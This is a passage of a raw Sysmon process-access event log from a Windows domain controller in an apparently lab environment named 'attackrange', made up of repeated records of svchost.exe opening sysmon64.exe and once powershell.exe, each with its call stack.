13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.150{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.057{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.040{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W